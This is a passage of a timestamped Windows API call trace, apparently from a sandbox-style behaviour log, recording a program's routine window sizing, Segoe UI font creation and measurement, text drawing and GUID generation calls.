[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
[0126.595] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
[0126.595] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
[0126.595] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.596] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.596] GetLastError () returned 0x0
[0126.596] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f14c) returned 0x0
[0126.596] GetLastError () returned 0x0
[0126.596] GdipGetFontSize (font=0x657f4d0, size=0x277f150) returned 0x0
[0126.596] GetLastError () returned 0x0
[0126.596] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.596] GetLastError () returned 0x0
[0126.596] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.597] GetLastError () returned 0x0
[0126.597] GdipGetFontHeight (font=0x657f4d0, graphics=0x657f4f8, height=0x19dd30) returned 0x0
[0126.597] GetLastError () returned 0x0
[0126.597] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.597] GetLastError () returned 0x0
[0126.597] GdipDeleteGraphics (graphics=0x657f4f8) returned 0x0
[0126.597] GetLastError () returned 0x0
[0126.597] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.597] GetLastError () returned 0x0
[0126.597] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.597] GetLastError () returned 0x0
[0126.597] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.598] GetLastError () returned 0x0
[0126.598] GdipGetFontHeight (font=0x657f4d0, graphics=0x657f4f8, height=0x19dcc4) returned 0x0
[0126.598] GetLastError () returned 0x0
[0126.598] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.598] GetLastError () returned 0x0
[0126.598] GdipDeleteGraphics (graphics=0x657f4f8) returned 0x0
[0126.598] GetLastError () returned 0x0
[0126.598] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.598] GetLastError () returned 0x0
[0126.598] GetSystemMetrics (nIndex=5) returned 1
[0126.598] GetSystemMetrics (nIndex=6) returned 1
[0126.598] GetSystemMetrics (nIndex=5) returned 1
[0126.598] GetSystemMetrics (nIndex=6) returned 1
[0126.598] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.598] GetSystemMetrics (nIndex=5) returned 1
[0126.598] GetSystemMetrics (nIndex=6) returned 1
[0126.599] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.599] GetSystemMetrics (nIndex=5) returned 1
[0126.599] GetSystemMetrics (nIndex=6) returned 1
[0126.599] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.600] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.600] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f354) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.600] GdipGetFontSize (font=0x657f4f8, size=0x277f358) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.600] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.600] GetLastError () returned 0x0
[0126.600] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.600] GetLastError () returned 0x0
[0126.601] GdipGetFontHeight (font=0x657f4f8, graphics=0x657f520, height=0x19dd30) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.601] GetLastError () returned 0x0
[0126.601] GdipDeleteGraphics (graphics=0x657f520) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.601] GetLastError () returned 0x0
[0126.601] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.601] GetLastError () returned 0x0
[0126.601] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] GdipGetFontHeight (font=0x657f4f8, graphics=0x657f520, height=0x19dcc4) returned 0x0
[0126.601] GetLastError () returned 0x0
[0126.601] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.602] GetLastError () returned 0x0
[0126.602] GdipDeleteGraphics (graphics=0x657f520) returned 0x0
[0126.602] GetLastError () returned 0x0
[0126.602] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.602] GetLastError () returned 0x0
[0126.602] GetSystemMetrics (nIndex=5) returned 1
[0126.602] GetSystemMetrics (nIndex=6) returned 1
[0126.602] GetSystemMetrics (nIndex=5) returned 1
[0126.602] GetSystemMetrics (nIndex=6) returned 1
[0126.602] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.602] GetSystemMetrics (nIndex=5) returned 1
[0126.602] GetSystemMetrics (nIndex=6) returned 1
[0126.602] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.603] GetSystemMetrics (nIndex=5) returned 1
[0126.603] GetSystemMetrics (nIndex=6) returned 1
[0126.603] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.604] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.604] GetLastError () returned 0x0
[0126.604] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f6a4) returned 0x0
[0126.604] GetLastError () returned 0x0
[0126.604] GdipGetFontSize (font=0x657f520, size=0x277f6a8) returned 0x0
[0126.604] GetLastError () returned 0x0
[0126.607] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.607] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.615] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.615] GetLastError () returned 0x0
[0126.615] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277f980) returned 0x0
[0126.615] GetLastError () returned 0x0
[0126.615] GdipGetFontSize (font=0x657f548, size=0x277f984) returned 0x0
[0126.615] GetLastError () returned 0x0
[0126.615] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.615] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.616] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.616] GetLastError () returned 0x0
[0126.616] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277fb24) returned 0x0
[0126.616] GetLastError () returned 0x0
[0126.616] GdipGetFontSize (font=0x657f570, size=0x277fb28) returned 0x0
[0126.616] GetLastError () returned 0x0
[0126.616] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.619] GetLastError () returned 0x0
[0126.619] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.620] GdipGetFontHeight (font=0x657f570, graphics=0x657f598, height=0x19dd30) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.620] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.620] GetLastError () returned 0x0
[0126.620] GdipDeleteGraphics (graphics=0x657f598) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.620] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.620] GetLastError () returned 0x0
[0126.620] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.620] GetLastError () returned 0x0
[0126.620] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.620] GetLastError () returned 0x0
[0126.621] GdipGetFontHeight (font=0x657f570, graphics=0x657f598, height=0x19dcc4) returned 0x0
[0126.621] GetLastError () returned 0x0
[0126.621] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.621] GetLastError () returned 0x0
[0126.621] GdipDeleteGraphics (graphics=0x657f598) returned 0x0
[0126.621] GetLastError () returned 0x0
[0126.621] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.621] GetLastError () returned 0x0
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.621] GetSystemMetrics (nIndex=5) returned 1
[0126.621] GetSystemMetrics (nIndex=6) returned 1
[0126.621] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.622] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.622] GetLastError () returned 0x0
[0126.623] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277fdcc) returned 0x0
[0126.623] GetLastError () returned 0x0
[0126.623] GdipGetFontSize (font=0x657f598, size=0x277fdd0) returned 0x0
[0126.623] GetLastError () returned 0x0
[0126.623] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.623] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.624] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.624] GetLastError () returned 0x0
[0126.624] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x278001c) returned 0x0
[0126.624] GetLastError () returned 0x0
[0126.624] GdipGetFontSize (font=0x657f8e0, size=0x2780020) returned 0x0
[0126.624] GetLastError () returned 0x0
[0126.624] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.624] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.626] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.626] GetLastError () returned 0x0
[0126.626] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27801dc) returned 0x0
[0126.626] GetLastError () returned 0x0
[0126.626] GdipGetFontSize (font=0x657f7c8, size=0x27801e0) returned 0x0
[0126.626] GetLastError () returned 0x0
[0126.626] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.626] GetLastError () returned 0x0
[0126.626] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.627] GdipGetFontHeight (font=0x657f7c8, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.627] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.627] GetLastError () returned 0x0
[0126.627] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.627] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.627] GetLastError () returned 0x0
[0126.627] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.627] GetLastError () returned 0x0
[0126.627] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.627] GetLastError () returned 0x0
[0126.628] GdipGetFontHeight (font=0x657f7c8, graphics=0x657f9c8, height=0x19dcc4) returned 0x0
[0126.628] GetLastError () returned 0x0
[0126.628] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.628] GetLastError () returned 0x0
[0126.628] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.628] GetLastError () returned 0x0
[0126.628] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.628] GetLastError () returned 0x0
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.628] GetSystemMetrics (nIndex=5) returned 1
[0126.628] GetSystemMetrics (nIndex=6) returned 1
[0126.628] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.630] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.630] GetLastError () returned 0x0
[0126.630] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780474) returned 0x0
[0126.630] GetLastError () returned 0x0
[0126.630] GdipGetFontSize (font=0x657f868, size=0x2780478) returned 0x0
[0126.630] GetLastError () returned 0x0
[0126.630] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.630] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.632] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.632] GetLastError () returned 0x0
[0126.632] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x27806c4) returned 0x0
[0126.632] GetLastError () returned 0x0
[0126.632] GdipGetFontSize (font=0x657f7f0, size=0x27806c8) returned 0x0
[0126.632] GetLastError () returned 0x0
[0126.632] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.632] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.634] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.634] GetLastError () returned 0x0
[0126.634] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780914) returned 0x0
[0126.634] GetLastError () returned 0x0
[0126.634] GdipGetFontSize (font=0x657f890, size=0x2780918) returned 0x0
[0126.634] GetLastError () returned 0x0
[0126.634] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.634] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.659] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.659] GetLastError () returned 0x0
[0126.659] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780b50) returned 0x0
[0126.659] GetLastError () returned 0x0
[0126.660] GdipGetFontSize (font=0x657f818, size=0x2780b54) returned 0x0
[0126.660] GetLastError () returned 0x0
[0126.661] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.662] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.665] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.665] GetLastError () returned 0x0
[0126.665] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780d60) returned 0x0
[0126.665] GetLastError () returned 0x0
[0126.665] GdipGetFontSize (font=0x657f5e8, size=0x2780d64) returned 0x0
[0126.665] GetLastError () returned 0x0
[0126.665] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.665] AdjustWindowRectEx (in: lpRect=0x19dd14, dwStyle=0x5600000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd14) returned 1
[0126.667] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.667] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2780ef4) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.667] GdipGetFontSize (font=0x657f6d8, size=0x2780ef8) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.667] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.667] GetLastError () returned 0x0
[0126.667] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.667] GetLastError () returned 0x0
[0126.668] GdipGetFontHeight (font=0x657f6d8, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.668] GetLastError () returned 0x0
[0126.668] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.668] GetLastError () returned 0x0
[0126.668] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.668] GetLastError () returned 0x0
[0126.668] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.668] GetLastError () returned 0x0
[0126.708] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.708] GetLastError () returned 0x0
[0126.708] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc08) returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] GdipGetFontHeight (font=0x657f6d8, graphics=0x657f9c8, height=0x19dc00) returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.709] GetLastError () returned 0x0
[0126.709] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.709] GetLastError () returned 0x0
[0126.709] GdipGetFamilyName (in: family=0x65769f0, name=0x7a8160, language=0x409 | out: name="Segoe UI") returned 0x0
[0126.709] GetLastError () returned 0x0
[0126.709] GetDeviceCaps (hdc=0x380106da, index=90) returned 96
[0126.709] GetLastError () returned 0x0
[0126.710] CreateFontIndirectW (lplf=0x73db10) returned 0x780a0998
[0126.710] GetLastError () returned 0x0
[0126.710] GetObjectW (in: h=0x780a0998, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0126.710] GetLastError () returned 0x0
[0126.710] SelectObject (hdc=0x380106da, h=0x780a0998) returned 0x2a0a0693
[0126.710] GetLastError () returned 0x0
[0126.710] GetMapMode (hdc=0x380106da) returned 1
[0126.710] GetLastError () returned 0x0
[0126.710] GetTextMetricsW (in: hdc=0x380106da, lptm=0x19dae8 | out: lptm=0x19dae8) returned 1
[0126.711] GetLastError () returned 0x0
[0126.711] DrawTextExW (in: hdc=0x380106da, lpchText="j^", cchText=2, lprc=0x19dbf4, format=0x420, lpdtp=0x2781274 | out: lpchText="j^", lprc=0x19dbf4) returned 25
[0126.737] GetLastError () returned 0x0
[0126.744] GdipGetFamilyName (in: family=0x65769f0, name=0x7a8160, language=0x409 | out: name="Segoe UI") returned 0x0
[0126.744] GetLastError () returned 0x0
[0126.744] GetDeviceCaps (hdc=0x380106da, index=90) returned 96
[0126.745] GetLastError () returned 0x0
[0126.745] CreateFontIndirectW (lplf=0x73db10) returned 0x2d0a09b1
[0126.745] GetLastError () returned 0x0
[0126.745] GetObjectW (in: h=0x2d0a09b1, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0126.745] GetLastError () returned 0x0
[0126.768] GetTextExtentPoint32W (in: hdc=0x380106da, lpString="0", c=1, psizl=0x27813c4 | out: psizl=0x27813c4) returned 1
[0126.769] GetLastError () returned 0x0
[0126.846] DeleteObject (ho=0x2d0a09b1) returned 1
[0126.846] GetLastError () returned 0x0
[0126.847] GetSystemMetrics (nIndex=45) returned 2
[0126.847] GetSystemMetrics (nIndex=46) returned 2
[0126.849] GetSystemMetrics (nIndex=7) returned 3
[0126.849] GetSystemMetrics (nIndex=8) returned 3
[0126.852] AdjustWindowRectEx (in: lpRect=0x19dcfc, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcfc) returned 1
[0126.854] AdjustWindowRectEx (in: lpRect=0x19dcfc, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcfc) returned 1
[0126.903] CoCreateGuid (in: pguid=0x19d544 | out: pguid=0x19d544*(Data1=0x5913eb50, Data2=0x520c, Data3=0x4070, Data4=([0]=0x8f, [1]=0x2e, [2]=0xd2, [3]=0x53, [4]=0x25, [5]=0x27, [6]=0x6, [7]=0x8b))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d534 | out: pguid=0x19d534*(Data1=0x7707feb5, Data2=0x953c, Data3=0x4d85, Data4=([0]=0xbe, [1]=0x47, [2]=0xe2, [3]=0xa5, [4]=0xf0, [5]=0xae, [6]=0xc2, [7]=0xe3))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d524 | out: pguid=0x19d524*(Data1=0xb7e5b945, Data2=0x3351, Data3=0x4635, Data4=([0]=0x9f, [1]=0x71, [2]=0x25, [3]=0xb3, [4]=0xdd, [5]=0x4d, [6]=0x13, [7]=0x8a))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d514 | out: pguid=0x19d514*(Data1=0x91472553, Data2=0x19c3, Data3=0x4de1, Data4=([0]=0x8b, [1]=0x41, [2]=0xf8, [3]=0xfe, [4]=0xb3, [5]=0x7d, [6]=0xa9, [7]=0x7b))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d504 | out: pguid=0x19d504*(Data1=0x9edc5923, Data2=0xfa4a, Data3=0x42c7, Data4=([0]=0x92, [1]=0x7, [2]=0x39, [3]=0xd, [4]=0x3e, [5]=0xe0, [6]=0x39, [7]=0x9d))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4f4 | out: pguid=0x19d4f4*(Data1=0x7e3fa42b, Data2=0xa2de, Data3=0x4f2b, Data4=([0]=0x93, [1]=0xbe, [2]=0xa6, [3]=0x4d, [4]=0x1a, [5]=0x82, [6]=0x4f, [7]=0x48))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4e4 | out: pguid=0x19d4e4*(Data1=0xb389efcf, Data2=0xf2fb, Data3=0x4cfd, Data4=([0]=0x91, [1]=0x4d, [2]=0x50, [3]=0xfb, [4]=0xb8, [5]=0xb1, [6]=0x61, [7]=0x49))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4d4 | out: pguid=0x19d4d4*(Data1=0x8824f174, Data2=0xb0ac, Data3=0x439d, Data4=([0]=0x80, [1]=0x2f, [2]=0xbc, [3]=0xa6, [4]=0xcf, [5]=0xd, [6]=0x62, [7]=0x95))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4c4 | out: pguid=0x19d4c4*(Data1=0x41ab7909, Data2=0xa843, Data3=0x4906, Data4=([0]=0x98, [1]=0xed, [2]=0xc0, [3]=0x33, [4]=0xa3, [5]=0x31, [6]=0x2c, [7]=0xc5))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4b4 | out: pguid=0x19d4b4*(Data1=0x917ccbe, Data2=0x7fd4, Data3=0x412c, Data4=([0]=0xbf, [1]=0xe2, [2]=0xc4, [3]=0xa2, [4]=0x7d, [5]=0xe1, [6]=0xa3, [7]=0x71))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d4a4 | out: pguid=0x19d4a4*(Data1=0x6cd51311, Data2=0x7b43, Data3=0x48a1, Data4=([0]=0x9a, [1]=0x5b, [2]=0xcd, [3]=0xb6, [4]=0x8e, [5]=0xc1, [6]=0x35, [7]=0xea))) returned 0x0
[0126.904] CoCreateGuid (in: pguid=0x19d494 | out: pguid=0x19d494*(Data1=0x3e255e00, Data2=0x4399, Data3=0x4977, Data4=([0]=0xa1, [1]=0xec, [2]=0xb0, [3]=0x1a, [4]=0x67, [5]=0xca, [6]=0xcc, [7]=0xcf))) returned 0x0
[0126.905] CoCreateGuid (in: pguid=0x19d514 | out: pguid=0x19d514*(Data1=0xc563efd5, Data2=0xc9b4, Data3=0x4ad1, Data4=([0]=0x98, [1]=0x54, [2]=0x97, [3]=0x91, [4]=0xc2, [5]=0xfd, [6]=0x87, [7]=0xc7))) returned 0x0
[0126.905] CoCreateGuid (in: pguid=0x19d504 | out: pguid=0x19d504*(Data1=0xbed7cd6d, Data2=0x28f6, Data3=0x4503, Data4=([0]=0x95, [1]=0xe6, [2]=0xa8, [3]=0x53, [4]=0xe7, [5]=0xf5, [6]=0x61, [7]=0xd2))) returned 0x0
[0126.905] CoCreateGuid (in: pguid=0x19d4f4 | out: pguid=0x19d4f4*(Data1=0x70edffd9, Data2=0x3f46, Data3=0x495a, Data4=([0]=0x92, [1]=0x3c, [2]=0x3f, [3]=0x82, [4]=0x28, [5]=0xf8, [6]=0x4, [7]=0x27))) returned 0x0
[0126.955] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.955] GetLastError () returned 0x0
[0126.955] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x2784fdc) returned 0x0
[0126.955] GetLastError () returned 0x0
[0126.955] GdipGetFontSize (font=0x657f700, size=0x2784fe0) returned 0x0
[0126.955] GetLastError () returned 0x0
[0126.955] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.956] GetLastError () returned 0x0
[0126.956] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.956] GetLastError () returned 0x0
[0126.956] GdipGetFontHeight (font=0x657f700, graphics=0x657f9c8, height=0x19dd30) returned 0x0
[0126.956] GetLastError () returned 0x0
[0126.956] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.956] GetLastError () returned 0x0
[0126.956] GdipDeleteGraphics (graphics=0x657f9c8) returned 0x0
[0126.956] GetLastError () returned 0x0
[0126.956] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.956] GetLastError () returned 0x0
[0126.956] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.956] GetLastError () returned 0x0
[0126.956] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.957] GetLastError () returned 0x0
[0126.957] GdipGetFontHeight (font=0x657f700, graphics=0x657f9c8, height=0x19dcc4) returned 0x0
[0126.957] GetLastError () returned 0x0
[0126.957] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
